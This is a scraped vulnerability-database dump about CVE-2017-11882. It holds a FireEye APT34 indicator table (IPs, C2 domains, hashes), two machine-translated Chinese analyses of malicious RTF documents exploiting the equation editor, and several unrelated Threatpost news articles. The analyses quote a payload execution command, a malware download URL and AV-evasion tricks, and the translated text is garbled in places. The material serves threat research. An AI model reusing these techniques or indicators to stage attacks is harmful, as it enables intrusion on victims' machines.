\n185.15.247.147\n\n| \n\nHas resolved dns-update[.]club \n \n145.239.33.100\n\n| \n\nHas resolved dns-update[.]club \n \n82.102.14.219\n\n| \n\nHas resolved ns2.dns-update[.]club &amp; hpserver[.]online &amp; anyportals[.]com \n \nv7-hpserver.online.hta\n\n| \n\nE6AC6F18256C4DDE5BF06A9191562F82 \n \ndUpdateCheckers.base\n\n| \n\n3C63BFF9EC0A340E0727E5683466F435 \n \nhUpdateCheckers.base\n\n| \n\nEEB0FF0D8841C2EBE643FE328B6D9EF5 \n \ncUpdateCheckers.bat\n\n| \n\nFB464C365B94B03826E67EABE4BF9165 \n \ndUpdateCheckers.ps1\n\n| \n\n635ED85BFCAAB7208A8B5C730D3D0A8C \n \nhUpdateCheckers.ps1\n\n| \n\n13B338C47C52DE3ED0B68E1CB7876AD2 \n \ngoogleupdateschecker.vbs\n\n| \n\nDBFEA6154D4F9D7209C1875B2D5D70D5 \n \nhpserver[.]online\n\n| \n\nC2 \n \nv7-anyportals.hta\n\n| \n\nEAF3448808481FB1FDBB675BC5EA24DE \n \ndUpdateCheckers.base\n\n| \n\n42449DD79EA7D2B5B6482B6F0D493498 \n \nhUpdateCheckers.base\n\n| \n\nA3FCB4D23C3153DD42AC124B112F1BAE \n \ndUpdateCheckers.ps1\n\n| \n\nEE1C482C41738AAA5964730DCBAB5DFF \n \nhUpdateCheckers.ps1\n\n| \n\nE516C3A3247AF2F2323291A670086A8F \n \nanyportals[.]com\n\n| \n\nC2\n", "modified": "2017-12-07T12:00:00", "published": "2017-12-07T12:00:00", "id": "FIREEYE:81A95C8CF481913A870A3CEAAA7AF394", "href": "https://www.fireeye.com/blog/threat-research/2017/12/targeted-attack-in-middle-east-by-apt34.html", "type": "fireeye", "title": "New Targeted Attack in the Middle East by APT34, a Suspected Iranian Threat Group, Using CVE-2017-11882 Exploit", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "myhack58": [{"lastseen": "2018-12-25T17:29:45", "bulletinFamily": "info", "cvelist": ["CVE-2017-11882", "CVE-2018-0802"], "description": "! [](/Article/UploadPic/2018-12/20181225205545726. png) \nRecently intercepted an extension doc word document to attack the samples, which format is actually RTF format. By analyzing the document composition the use of a cve-2017-11882 and cve-2018-0802 vulnerability, and use the embedded excel object is used to trigger the vulnerability. The release of the PE file is used to collect the target user's sensitive information. \n\nFirst, the basic situation \nIn the experimental environment win764, the Office 2010 open the document, process monitoring, found that the winword process is executed after the \u9996\u5148\u6267\u884cexcel.exe that \u7136\u540e\u8fd0\u884cEQNEDT32.exe that \u63a5\u7740\u8fd0\u884ccmd.exe finally run A process. X, in which EQNEDT32. exe running twice. \u770b\u5230EQNEDT32.exe bottle feel should be cve-2017-11882 or cve-2018-0802 samples. \nThe document is opened, display as a empty document, as shown below. \n! [](/Article/UploadPic/2018-12/20181225205545737. png) \nOn the figure, inadvertently probably thought it was empty, in fact, a closer look, found the top left a small black point icon. As shown below. \n! [](/Article/UploadPic/2018-12/20181225205545312. png) \nDouble-click the Find pop-up window, as shown below. Display the\u201cwindows cannot open this file: A. X\u201d. Obviously, the\u201csmall black dot\u201dshould be an external object. \n! [](/Article/UploadPic/2018-12/20181225205545780. png) \nRight-click the object, select\u201cpackager shell object\u201dobject, you can view the object's\u201cproperties\u201d. As shown below. \n! [](/Article/UploadPic/2018-12/20181225205545220. png) \nIts object properties as shown below: \n! [](/Article/UploadPic/2018-12/20181225205545229. png) \nSee here, we it can be concluded that: the sample should be is to use the RTF is embedded in a PE object in the open document when the default release to the%temp%directory, then use cve-2017-11882 or cve-2018-0802 execution of the process. \n\nSecond, the RTF analysis \n1, the document structure analysis \n! [](/Article/UploadPic/2018-12/20181225205545186. png) \nUse rtfobj attack on the document analysis, finding its embedded two objects, respectively, is a package object and an Excel. Sheet. 8 object. As shown in Fig. Package object the original file is\u201cC:\\\\\\Users\\\\\\n3o\\\\\\AppData\\\\\\Local\\\\\\Microsoft\\\\\\Windows\\\\\\INetCache\\\\\\Content.Word\\\\\\A.X\u201dit. From this it can be seen, the author of the document[operating system](<http://www.myhack58.com/Article/48/Article_048_1.htm>)user name: n3o on. \nWherein A. X is the release of the malicious PE file. \nThe other one is an embedded excel table object, we put the extract of the excel table the suffix renamed. xls after excel is opened. Find it contains two objects AAAA and bbbb are\u201cEquation. 3\u201dthe object, as shown below. \n! [](/Article/UploadPic/2018-12/20181225205545928. png) \nTo extract the excel table object, which is the document structure as shown below. \n! [](/Article/UploadPic/2018-12/20181225205545742. png) \nThe table includes two CLSID for\u201c0002ce02-0000-0000-c000-000000000046\u201dMicrosoft Equation 3.0 object MBD0002E630 and MBD0002E631, you can see the modification time for the 2018/5/21 17:of 52. \n! [](/Article/UploadPic/2018-12/20181225205545793. png) \nIn addition, two\u201cMicrosoft Equation 3.0\u201dobject. Ole10Native size of 59 bytes and 160 bytes, which contains a\u201ccmd.exe /c %tmp%\\A. X\u201dused to perform A. The X process. Should be used in combination for cve-2017-11882 and cve-2018-0802 two vulnerabilities. \nThus, we can fundamental analysis clear the sample, the overall flow diagram as the following figure shown. \n! [](/Article/UploadPic/2018-12/20181225205545654. png) \n2, the static document \nUse winhex to open, you can find the first package object in File 0x2A8A. Wherein 0x00137158 refers to the size of the object, that is, the decimal 1274200, it is the release of A. X size. Followed by IS PE file in winhex we can see that the author put the PE head 0x4D5A has been modified, inserted in the middle 0x090d is divided, so that it becomes[0x090d]4[0x090d]d[0x090d]5[0x090d]a[0x090d], in fact, is 0x4d5a, such an operation should be in order to avoid certain anti-virus of Avira, not directly to 0x4d5a9000 the look of the rendering, a look that is clearly of the PE file. Specific as shown below: \n! [](/Article/UploadPic/2018-12/20181225205545840. png) \nAnother object in 0x299061 position, is an Exce. Sheet. 8 object. Its size is 0x00005C00, that is, the decimal 23552, and rtfobj extracted exel size consistent. The author of the compound document header has changed, with 0x0909 is divided, so that d0cf11 at the beginning of the composite document into the d[0x0909]0[0x0909]\u3002 Should also be a certain sense of[free to kill](<http://www.myhack58.com/Soft/html/12/24/Soft_024_1.htm>)\n\n**[1] [[2]](<92510_2.htm>) [[3]](<92510_3.htm>) [next](<92510_2.htm>)**\n", "edition": 1, "modified": "2018-12-25T00:00:00", "published": "2018-12-25T00:00:00", "id": "MYHACK58:62201892510", "href": "http://www.myhack58.com/Article/html/3/62/2018/92510.htm", "title": "A use cve-2017-11882 and cve-2018-0802 combination of vulnerability a malicious document analysis-vulnerability warning-the black bar safety net", "type": "myhack58", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-12-02T18:49:48", "bulletinFamily": "info", "cvelist": ["CVE-2017-11882", "CVE-2018-0802"], "description": "Recently harvested a suffix called doc word document, view the After is actually a rich text format document. In a test environment to open after the discovery of a network connection and executing a program of action, determine the sample is malware document. After a preliminary analysis, found that the sample is CVE-2017-11882 vulnerabilities using a new sample. CVE-2017-11882 vulnerability and CVE-2018-0802 vulnerability based on Office equation editor processing logic, is the nearest office of malicious attacks document by conventional means. On the network for the vulnerability of the Genesis, the use of analysis of already in place, such as 360 days eye laboratory using the Office Equation Editor special processing logic of the newest[free to kill](<http://www.myhack58.com/Soft/html/12/24/Soft_024_1.htm>)technical analysis of CVE-2017-11882, as well as Tencent computer housekeeper NDAY vulnerability CVE-2017-11882 and 0Day vulnerability CVE-2018-0802 vulnerability combination of the dissemination of remote control Trojans of the sample analysis and other technical reports. The samples and before each analysis are slightly different, should be CVE-2017-11882 vulnerability and a variant version. \nFirst, the basic operation of the \nExperimental environment: windows 7 x64 sp1, Chinese edition, office 2010 Chinese version. \nThe vulnerability of the sample after opening, the display content of the document is garbled, as shown below. \n! [](https://image.3001.net/images/20181124/1543024815_5bf8b0aff1ceb.png! small) \nIn addition, in the%temp%directory to build and run a named emre. exe executable files. Capture found emre. exe from http://ghthf. cf/cert/ochicha. exe download generated. As shown below. \n! [](https://image.3001.net/images/20181124/1543025083_5bf8b1bb3a590.png! small) \nSecond, the vulnerability to debug \n1, the sample form \nwinhex opens the following two figures shown. The document directly behind the heel to display the content. \n! [](https://image.3001.net/images/20181124/1543025978_5bf8b53ac1bc7.png! small) \nFollowed by that object, as shown below. \n! [](https://image.3001.net/images/20181124/1543025728_5bf8b44012bda.png! small) \n2, RTF, a preliminary analysis of the \nWith rftobj after the analysis of the results is shown below. You can see the clsid for 0002ce02-0000-0000-c000-000000000046 i.e. Microsoft Equation Editor object. \n! [](https://image.3001.net/images/20181124/1543026347_5bf8b6ab810d7.png! small) \n! [](https://image.3001.net/images/20181124/1543026881_5bf8b8c10fb6b.png! small) \nFrom the figure we can see that the object name is\u201ceQuatiON native\u201d, the normal name of the object\u201cEquation Native\u201dfor the case conversion operations, may also be the pursuit of[free to kill](<http://www.myhack58.com/Soft/html/12/24/Soft_024_1.htm>)one of the effects. \n3, vulnerability debugging \nAccording to various aspects of the vulnerability analysis report, we direct commissioning a vulnerability where a function 0041160F it. \n! [](https://image.3001.net/images/20181124/1543027328_5bf8ba80a5a02.png! small) \nAfter the 11th rep after the operation, as in the following figure, the stack 0x0043F775 be covered. \n! [](https://image.3001.net/images/20181124/1543027588_5bf8bb8428e33.png! small) \n! [](https://image.3001.net/images/20181124/1543027800_5bf8bc58c5a27.png! small) \nAnd EQNEDT32. EXE process 0x0043F775 the value of is C3, happens to be the instruction retn\u3002 \n! [](https://image.3001.net/images/20181124/1543028035_5bf8bd439c8e9.png! small) \nAfter the execution jumps to the shellcode location. As shown below: \n! [](https://image.3001.net/images/20181124/1543028175_5bf8bdcf72dd2.png! small) \n4, the shellcode debugging analysis \nshellcode location in the eQuatiON-native object. \nDivided into two parts, wherein the start location 0\u00d70826, B9 C439E66A shown on figure 0018F354 at the disassembly instructions start to 0851, followed by four bytes 0x0043F7F5\uff08EQNEDT32. EXE process in the RETN instruction is. The second portion of the position in the 0x089E at the beginning to the end. \n! [](https://image.3001.net/images/20181124/1543028371_5bf8be938ff06.png! small) \nThe first part of the shellcode to jump to the second part of the compilation command as shown below: \n! [](https://image.3001.net/images/20181124/1543029212_5bf8c1dc1ce30.png! small) \nAfter analysis, found that the segment of shellcode, a series of jmp jump instruction operation, due to shellcode obfuscation and protection. For example, the following figure shows: \n! [](https://image.3001.net/images/20181124/1543029376_5bf8c280e0d65.png! small)\n\n**[1] [[2]](<92253_2.htm>) [next](<92253_2.htm>)**\n", "edition": 1, "modified": "2018-12-02T00:00:00", "published": "2018-12-02T00:00:00", "id": "MYHACK58:62201892253", "href": "http://www.myhack58.com/Article/html/3/62/2018/92253.htm", "title": "A CVE-2017-11882 vulnerability is a new variation of a sample of the debugging and analysis-vulnerability warning-the black bar safety net", "type": "myhack58", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "threatpost": [{"lastseen": "2018-10-06T23:10:20", "bulletinFamily": "info", "cvelist": ["CVE-2017-11882"], "description": "Trojan downloaders and malware that masquerades as security software are the two fastest growing threats on the Web right now, according an analysis by Microsoft\u2019s Malware Protection Center. In its latest [Software Intelligence Report](<http://www.microsoft.com/downloads/details.aspx?FamilyID=aa6e0660-dc24-4930-affd-e33572ccb91f&displaylang=en>), released on Wednesday, the MMPC found that a Trojan downloader named Renos that installs rogue security software was the most prevalent threat in the second half of 2008, increasing by 66 percent.\n\nTrojan downloaders in general have become a major problem as attackers continue to look for new ways to install malware on vulnerable machines. Microsoft found that these threats accounted for more than half of all of the malware removed by its Malicious Software Removal Tool from July through December of last year.\n\n\u201cThe prevalence of rogue security software has increased significantly over the past three periods. Rogue security software uses fear and annoyance tactics to convince victims to pay for \u2018full versions\u2019 of the software in order to remove and protect themselves from malware, to stop the continual alerts and warnings, or both,\u201d the report says.\n\n\n\nMicrosoft pulls the data for the SIR from the results it sees from removals of malware done by the MSRT on millions of PCs, both in the enterprise and in homes. So it\u2019s an interesting data set with a fairly broad sample base.\n\nOne other interesting nugget in the report is that only about 41 percent of browser-based exploits on pre-Vista versions of Windows targeted Microsoft products. On Vista, that number drops to about five percent. And both of those numbers have been going down over time. That\u2019s a trend that bears watching.\n\n_*Graph from Microsoft Security Intelligence Report_\n", "modified": "2013-04-17T16:39:25", "published": "2009-04-08T14:14:09", "id": "THREATPOST:8549E725CF51C109F7299A0CC5FACBE9", "href": "https://threatpost.com/microsoft-rogue-security-software-fastest-growing-online-threat-040809/72530/", "type": "threatpost", "title": "Microsoft: Rogue security software fastest-growing online threat", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-10-06T23:08:24", "bulletinFamily": "info", "cvelist": ["CVE-2017-11882"], "description": "[](<https://threatpost.com/microsoft-warns-new-ie-code-execution-flaw-030110/>)Microsoft\u2019s security response team is investigating reports of a potentially dangerous code execution vulnerability in its flagship Internet Explorer browser.\n\nThe company warned that an attacker could host a maliciously crafted web page and run arbitrary code if they could convince a user to visit the web page and then get them to press the F1 key in response to a pop up dialog box.\n\nMicrosoft\u2019s Jerry Bryant said the company is not aware of any attacks related to this vulnerability.\n\n\u201cWe have determined that users running Windows 7, Windows Server 2008 R2, Windows Server 2008, and Windows Vista, are not affected by this issue,\u201d Bryant said.\n\nFrom [the MSRC blog](<http://blogs.technet.com/msrc/archive/2010/02/28/investigating-a-new-win32hlp-and-internet-explorer-issue.aspx>): \n\nThe issue in question involves the use of VBScript and Windows Help files in Internet Explorer. Windows Help files are included in a long list of what we refer to as \u201cunsafe file types\u201d. These are file types that are designed to invoke automatic actions during normal use of the files. While they can be very valuable productivity tools, they can also be used by attackers to try and compromise a system. \n\nAlthough this issue has been publicly documented, Microsoft has not yet provided pre-patch mitigation guidance or workarounds for affected customers.\n", "modified": "2018-08-15T13:22:38", "published": "2010-03-01T14:26:26", "id": "THREATPOST:370DCA5103923FA8965F6D8890D4198F", "href": "https://threatpost.com/microsoft-warns-new-ie-code-execution-flaw-030110/73602/", "type": "threatpost", "title": "Microsoft Warns of New IE Code Execution Flaw", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-10-06T23:00:54", "bulletinFamily": "info", "cvelist": ["CVE-2017-11882"], "description": "Microsoft has released a new version of the MS13-036 patch that was causing some customers\u2019 machines to crash. The company had recommended in the days after the original fix was first released that customers [uninstall the MS13-036 patch](<http://threatpost.com/microsoft-uninstall-faulty-patch-tuesday-security-update-041213/>) while Microsoft investigated the cause of the problems.\n\nThe new fix that Microsoft released on Tuesday resolves some conflicts with third-party applications that apparently were causing the blue screen issues for some people. The company didn\u2019t specify which software was causing the crashes, but said that the update should resolve the problems.\n\n\u201cWe\u2019ve determined that the update, when paired with certain third-party software, can cause system errors,\u201d said Trustworthy Computing group manager Dustin Childs at the time that the patch was recalled earlier this month.\n\nThe MS13-036 patch fixes a pair of race condition vulnerabilities in the Windows kernel, both of which could be used for code execution. However, the patch was rated important rather than critical because an attacker would need physical access to a vulnerable machine in order to run code using one of these bugs.\n\nChilds said in a blog post Tuesday that customers should install the revised update as soon as possible.\n\n\u201cAs we [previously discussed](<http://blogs.technet.com/b/msrc/archive/2013/04/11/kb2839011-released-to-address-security-bulletin-update-issue.aspx> \"previously discussed\" ), we stopped distributing this update when we learned some customers were having issues. The new update, [KB2840149](<http://support.microsoft.com/kb/2840149> \"KB2840149\" ), still addresses the Moderate security issue described in MS13-036, and should not cause these issues. If you have automatic updates enabled, you won\u2019t need to take any actions. For those manually updating, we encourage you to apply this update at your earliest convenience,\u201d he said.\n", "modified": "2013-04-24T14:02:36", "published": "2013-04-24T10:00:23", "id": "THREATPOST:2C798ED7D1CE36B13D82410EA1C94D9F", "href": "https://threatpost.com/microsoft-releases-updated-ms13-036-patch/99885/", "type": "threatpost", "title": "Microsoft Releases Updated MS13-036 Patch", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-10-06T23:05:57", "bulletinFamily": "info", "cvelist": ["CVE-2017-11882"], "description": "**[](<https://threatpost.com/alex-lanstein-rustock-botnet-takedown-031811/>)**\n\nDennis Fisher talks with Alex Lanstein of FireEye about this week\u2019s takedown of the Rustock botnet, the important legal precedent it helped set with Microsoft\u2019s lawsuit and the mechanics behind the operation and dismantling of large-scale botnets.\n\n*Podcast audio courtesy of [sykboy65](<http://www.youtube.com/watch?v=Z8fMm3sm_ww&feature=channel_page>)\n\nSubscribe to the Digital Underground podcast on [](<http://itunes.apple.com/WebObjects/MZStore.woa/wa/viewPodcast?id=315355232>)\n", "modified": "2013-07-24T18:54:56", "published": "2011-03-18T15:03:59", "id": "THREATPOST:B7280795B2A42655BE9618D06EB9520A", "href": "https://threatpost.com/alex-lanstein-rustock-botnet-takedown-031811/75044/", "type": "threatpost", "title": "Alex Lanstein on the Rustock Botnet Takedown", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-10-06T23:00:56", "bulletinFamily": "info", "cvelist": ["CVE-2017-11882"], "description": "Microsoft is ready to officially declare network worms pass\u00e9 for the enterprise. In its latest [Security Intelligence Report](<http://www.microsoft.com/security/sir/default.aspx>), released Wednesday, Microsoft said that risks posed by Web-based threats to large, distributed network environments have surpassed malware such as Conficker.\n\nThe report is based on data collected from more than one billion endpoints in more than 100 countries by the company\u2019s Malicious Software Removal Tool, Hotmail accounts and Windows Defender users, said Holly Stewart, senior program manager for Microsoft\u2019s Malware Protection Center.\n\nFor years, Microsoft has considered Conficker the benchmark of network-based malware. The worm first popped up in 2008 and paved the way for other credential-stealing malware. Now that\u2019s changed, Stewart said.\n\n\u201cConficker has been thought of as the sentinel of infiltration,\u201d Stewart said. \u201cIt has not changed in years. It spreads using an old vulnerability. It steals passwords and uses USB drives and shared drives to move on the network. It\u2019s been tracked as a beacon of things within the network when things are not quite right.\u201d\n\n[Conficker](<http://threatpost.com/en_us/blogs/conficker-working-group-efforts-fight-botnet-mixed-bag-012511>) is more of a chameleon, constantly changing propagation methods and malware techniques. The worm emerged in November 2008 and attacked a Windows vulnerability to steal passwords and build one of the more formidable botnets ever recorded, reaching a peak of 12 million bots in 2009 according to some estimates. But as enterprises in particular shore up their security efforts, [Conficker infections](<https://threatpost.com/en_us/blogs/conficker-worm-continues-evolve-confound-researchers-032009>) are dwindling noticeably, Microsoft said. The drop coincides with a number of factors, including increased password vigilance and a policy decision by Microsoft to disable its Autorun functionality by default starting with Windows XP and Vista in 2011.\n\n\u201cConficker started to decline in Q2 2011. If you look at two other worms, Autorun and Rimecud, both used the same propagation method and both had serious declines (37 percent and 69 percent respectively),\u201d Stewart said. \u201cCertainly there\u2019s a correlation of the amount of threats we saw in the enterprise; it seems to indicate the decision had some impact.\u201d\n\n[Autorun malware](<http://threatpost.com/en_us/blogs/infections-will-not-die-conficker-and-autorun-011712>) spreads via removable media and generally drops backdoors that enable additional malware infections such as keyloggers that steal credentials and other personal data. Rimecud is similar malware in that it propagates via USB drives and instant messenger applications. Its\n\npayload includes backdoor connections to remote servers and additional malware is installed from third-party servers and peer-to-peer networks.\n\nNaturally, however, enterprises aren\u2019t out of the woods now that network worms have tailed off. Web-based threats have been a growing threat for years as hackers exploit common input-validation vulnerabilities with automated SQL injection attacks or cross-site scripting attacks that enable them to remotely control vulnerable browsers. Users are redirected to sites hosting malicious content and are infected with more malware, or are lured to an attacker-controlled site via social engineering (phishing, spam, typo-squatting) and tricked into entering legitimate credentials. The result has been a spike in Web-based attacks, in particular iFrame Redirects.\n\nThe Microsoft SIR said that seven of the top 10 threats it detects involves some sort of malicious website or compromised Web content, and two of those seven are iFrame-redirection attacks. Stewart said 3.3 million iFrame redirections were detected, a five-fold increase.\n\n[](<https://media.threatpost.com/wp-content/uploads/sites/103/2013/04/07052206/SIR2013.jpg>)\n\n\u201cIt\u2019s a really big shift in what we\u2019re seeing as top threats for the enterprise,\u201d Stewart said. \u201cMalicious iFrame redirection is a middle man in these Web-based attacks; it\u2019s that little component where the user is exposed to malicious content.\u201d\n\nHackers have been able to automate scans for sites vulnerable to attacks such as SQL injection. A targeted Google search, for example, will render a detailed and sizeable list of Web servers vulnerable to any number of attacks. IFrame attacks are effective because the code is not obvious to the user or even the Web administrator for example, because the attacker isn\u2019t adding a page to the vulnerable server, defacing a page or adding\n\nmalware, just a redirector, Stewart said.\n\n\u201cThe iFrame exposes visitors to bad stuff that the attacker is hosting somewhere else,\u201d Stewart said. \u201cIt\u2019s a piece in the chain of a Web-based delivery system.\u201d\n\nIFrame attacks are not alone. Other threats such as Zbot, or the Zeus Trojan, the Blacole Trojan and keygen programs that generate product keys used to validate pirated software climbed the charts, Microsoft said.\n\n\u201cEnterprise customers are much more exposed than ever to malicious Web content,\u201d Stewart said.\n", "modified": "2013-04-22T20:47:19", "published": "2013-04-18T11:11:17", "id": "THREATPOST:8E01B2E26F588D0FA5B0857DCEF926DA", "href": "https://threatpost.com/move-over-conficker-web-threats-are-top-enterprise-risk/99762/", "type": "threatpost", "title": "Move Over Conficker, Web Threats are Top Enterprise Risk", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-10-06T22:59:12", "bulletinFamily": "info", "cvelist": ["CVE-2017-11882"], "description": "VANCOUVER \u2013 Successful exploits at the Pwn2Own contest get all the glitz, but the rarities are the exploits that fail.\n\nA group of four young South Korean hackers from ASRT, all of them well shy of their thirtieth birthdays, stood in proxy for Jung Hoon Lee. Lee was home fulfilling a military obligation, a promise that kept him from seeing his Internet Explorer 11 exploit come up short Thursday morning.\n\nHP\u2019s Zero Day Initiative, sponsors of the event, said they bought the vulnerability regardless, and worked with the researchers on breaking down the details. The particulars would also be shared with Microsoft as is customary with all bugs purchased by ZDI, sharing them with the affected vendors.\n\nRegistrants at Pwn2Own have 30 minutes to demonstrate their exploit and verify it works by executing the calculator application on the underlying system. In this case, Lee\u2019s exploit was chasing down a vulnerability in IE 11 on a fully patched 64-bit Windows 8.1 machine. A successful exploit would have been worth $100,000.\n\nGenerally, entrants in Pwn2Own withdraw if there are difficulties with their exploits. On Tuesday, Microsoft rolled out another patch for Internet Explorer. The cumulative rollup, a regular Patch Tuesday update, repaired a zero-day in Internet Explorer 10 being used in targeted attacks, including Operation SnowMan targeting the U.S. Veterans of Foreign Wars and a separate attack on a French aerospace manufacturer. It was not disclosed whether the patch affected the Lee exploit.\n\nThe failure of Lee\u2019s exploit was in stark contrast to others demonstrated to that point, including one by German researcher Sebastian Apelt of Siberas who succeeded against IE 11. Apelt\u2019s exploit worked in less than a minute and was good for $100,000. Earlier on Thursday, a pair of Chinese hackers from the Keen Team successfully exploited a zero-day vulnerability in Apple\u2019s Safari browser to gain control of a Macbook running OS X Mavericks. That exploit was worth $65,000 and the members of Keen Team announced they would donate a portion of that to Malaysian charities.\n\nSoon after the IE setback, Pwn2Own regular George Hotz took down Firefox to collect a $50,000 prize. Hotz is perhaps better known for his jailbreaking exploits against the iPhone and the PlayStation gaming console. Hotz\u2019s attack against Firefox was the fourth time zero-days were exploited in the Mozilla browser during the two-day event.\n\nHackers from French exploit vendor Vupen took down both Internet Explorer and Firefox on Wednesday as part of a $350,000 haul. Vupen also beat Adobe Reader and Flash. On Thursday, Vupen has another exploit for Chrome worth another $100,000. Once the Keen Team popped Safari today, Vupen withdrew its Safari bug. It also withdrew its Java entry on Wednesday.\n\nVupen founder Chaouki Bekrar said his researchers prepared for two months in advance on Pwn2Own and had little trouble with IE 11 yesterday, using a a use-after-free vulnerability combined with an \u201cobject confusion\u201d to bypass the IE sandbox, Bekrar said.\n\n\u201cIt\u2019s definitely getting harder to exploit browsers, especially on Windows 8.1,\u201d Bekrar said. \u201cExploitation is harder and finding zero-days in browsers is harder.\u201d\n\nVupen\u2019s successful exploit of Firefox on Wednesday also took advantage of a different use-after-free zero day to bypass ASLR and DEP memory protections in Windows. Bekrar said the bug was found through the use of fuzzers against 60 million test cases.\n\n\u201cThat proves Firefox has done a great job fixing flaws; the same for Chrome,\u201d Bekrar said. \u201cChrome has the strongest sandbox, so that\u2019s even more difficult to create exploits for.\u201d\n\nZDI announced prior to the event it would buy all the Pwn2Own bugs at a price of close to $1.1 million.\n", "modified": "2014-03-13T23:33:53", "published": "2014-03-13T19:33:53", "id": "THREATPOST:0D250E6E576E1C05274E04DB1BB79529", "href": "https://threatpost.com/ie-11-stands-up-to-pwn2own-exploit-attempt/104786/", "type": "threatpost", "title": "IE 11 Stands Up to Pwn2Own Exploit Attempt", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-10-06T23:07:10", "bulletinFamily": "info", "cvelist": ["CVE-2017-11882"], "description": "[](<https://threatpost.com/dll-hijacking-exploit-code-posted-powerpoint-other-apps-082410/>)A day after [Microsoft released information on the remotely exploitable DLL-hijacking vulnerability](<https://www.microsoft.com/technet/security/advisory/2269637.mspx>) that affects dozens of Windows applications, researchers are starting to discover exactly which pieces of software are vulnerable. The list so far includes PowerPoint, Wireshark and some applications that are included by default with Windows Vista, and possibly Windows 7.\n\nThe class of vulnerabilities that is being described as DLL hijacking or DLL preloading enables an attacker to hide a malicious DLL in a directory on a network or WebDAV share and convincing a user to open a file that will silently load the DLL. The vulnerability itself has been known for at least 10 years, but Microsoft officials had considered it a low-impact flaw because it was thought that an attacker would only be able to exploit it locally. However, researchers such as Aviv Raff and others have shown in recent years that it could be exploited remotely under some circumstances.\n\nAnd late last week HD Moore of the Metasploit Project and Rapid7 said that he\u2019d found other reliable ways to remotely exploit the flaw and had identified 40 or so Windows applications that are vulnerable. Moore detailed his findings in a [blog post](<http://blog.rapid7.com/?p=5325>) Tuesday. Now, information is beginning to filter out about exactly which applications are vulnerable, along with exploit code for some of them.\n\nEarly Tuesday, exploit code for the DLL hijacking flaw was posted for both [Microsoft PowerPoint](<http://www.exploit-db.com/exploits/14723/>) and [Wireshark](<http://www.exploit-db.com/exploits/14721/>), a network protocol analyzer. Raff also said [in a message on Twitter](<https://twitter.com/avivra/statuses/21994799124>) Tuesday that some software included with Windows Vista, and possibly Windows 7, is vulnerable to the attack. Microsoft has not released a list of which applications are known to be vulnerable to the DLL-hijacking flaw, nor has Moore. \n\nWhile Microsoft is in the process of continuing its investigation into the class of flaws, the company has published a description of the problem, along with a [tool that can help mitigate the DLL-hijacking vulnerability](<http://support.microsoft.com/kb/2264107>). Moore also has [released an audit tool](<http://blog.rapid7.com/?p=5325>) that can identify vulnerable applications on a local system. \n\n**[See: [HD Moore on the Windows DLL Vulnerability podcast](<https://threatpost.com/dll-hijacking-exploit-code-posted-powerpoint-other-apps-082410/>)]**\n\n\u201cWhen an application loads a DLL without specifying a fully qualified \npath name, Windows will attempt to locate the DLL by searching a defined \nset of directories. We have discussed the DLL search path [on this blog](<http://blogs.technet.com/b/srd/archive/2009/04/14/ms09-014-addressing-the-safari-carpet-bomb-vulnerability.aspx>) and it has also been explained well on [David LeBlanc\u2019s blog](<http://blogs.msdn.com/b/david_leblanc/archive/2008/02/20/dll-preloading-attacks.aspx>). \nFor the sake of this issue, its sufficient to say that if an attacker \ncan cause an application to LoadLibrary() while the application\u2019s \ncurrent directory is set to an attacker-controlled directory, the \napplication will run the attacker\u2019s code.[ Development best practices ](<http://msdn.microsoft.com/en-us/library/ff919712%28VS.85%29.aspx>)state \nthat applications should call SetDllDirectory with a blank path before \ncalling LoadLibrary(\u201cfoo.dll\u201d) to ensure that foo.dll is not loaded from \nthe current directory. We are investigating whether any of our own \napplications are affected by this class of vulnerability so that we can \ntake appropriate action to protect customers,\u201d Microsoft\u2019s [Jonathan Ness said in a blog post](<http://blogs.technet.com/b/srd/>).\n\nThe first public mention of this class of vulnerabilities appears to have been an [advisory posted to BugTraq by researcher Georgi Guninski](<http://www.securityfocus.com/bid/1699/info>) in 2000, in which Guninski details the problem and lists dozens of versions of Windows that are susceptible to the attack. Raff also [discussed the DLL problem](<http://aviv.raffon.net/2006/12/14/IE7DLLloadHijackingCodeExecutionExploitPoC.aspx>) publicly back in 2006. \n", "modified": "2018-08-15T12:10:15", "published": "2010-08-24T14:47:41", "id": "THREATPOST:F1E0D1BF5C51CAA730D94DB196D962D1", "href": "https://threatpost.com/dll-hijacking-exploit-code-posted-powerpoint-other-apps-082410/74370/", "type": "threatpost", "title": "DLL Hijacking Exploit Code Posted for PowerPoint, Other Apps", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-10-06T23:03:24", "bulletinFamily": "info", "cvelist": ["CVE-2017-11882"], "description": "_Editor\u2019s Note: This is the second of a [two-part](<https://threatpost.com/how-free-market-fails-privacy-conscious-consumers-040412/>) podcast with independent security researcher Chris Soghoian. _\n\nIn the [first part](<https://threatpost.com/how-free-market-fails-privacy-conscious-consumers-040412/>) of our podcast with independent security researcher Chris Soghoian, we talked about the way that the proliferation of \u201cfree\u201d applications have forced consumers into the position of increasingly trading privacy for access to cool new Web sites and tools. The market, Soghoian argued, has failed to provide choice to consumers who may want to participate in social networks, but don\u2019t want their online activities passed along to advertisers. __\n\nIn the second half of his interview with Threatpost Editor 